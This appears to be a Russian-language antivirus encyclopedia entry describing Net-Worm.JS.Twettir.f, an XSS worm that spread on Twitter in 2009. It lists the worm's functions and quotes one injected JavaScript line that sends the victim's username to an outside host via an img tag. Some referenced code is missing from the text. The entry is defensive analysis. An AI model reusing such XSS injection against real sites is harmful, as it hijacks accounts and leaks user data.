Net-Worm.JS.Twettir.f

Технические детали

Семейство XSS-червей, распространявшихся в социальной сети Twitter в апреле 2009 года. Для своего размножения использовали XSS-уязвимости и были созданы 17-и летним американцем Michael "Mikeyy" Mooney.

Червь использовал уязвимости в программном обеспечении Twitter, позволявшие производить атаки типа «межсайтовый скриптинг» (XSS) и модифицировать страницы учётных записей пользователей. Заражение происходило при посещении модифицированной страницы на сайте Twitter, или при переходе по гиперссылке в поддельном сообщении, присланном от имени участника Twitter. При этом исполнялся вредоносный сценарий JavaScript.

Основной функционал червей содержится в трех функциях:

• XHConn – использует стандартную функцию XMLHttpRequest() для ajax-вызовов;
• Urlencode – использует стандартную функцию encodeURIComponent() для кодировки URI;
• Wait – содержит вредоносный функционал.

Оставлено одно рассылаемое сообщение:

Инициируется выполнение скрипта x.php в теге img, которому передается параметр username текущего пользователя:

document.write("<img src='http://www.stalkdaily.com/x.php?username=" + username + "'>");

Заражение страницы пользователя происходит аналогично Net-Worm.JS.Twettir.e , т.е. посредством изменения его параметра user[name] и добавления все той же ссылки:

Также червь изменяет параметры пользователя на следующие:

в результате чего у зараженного пользователя меняется имя аккаунта и фон его страницы.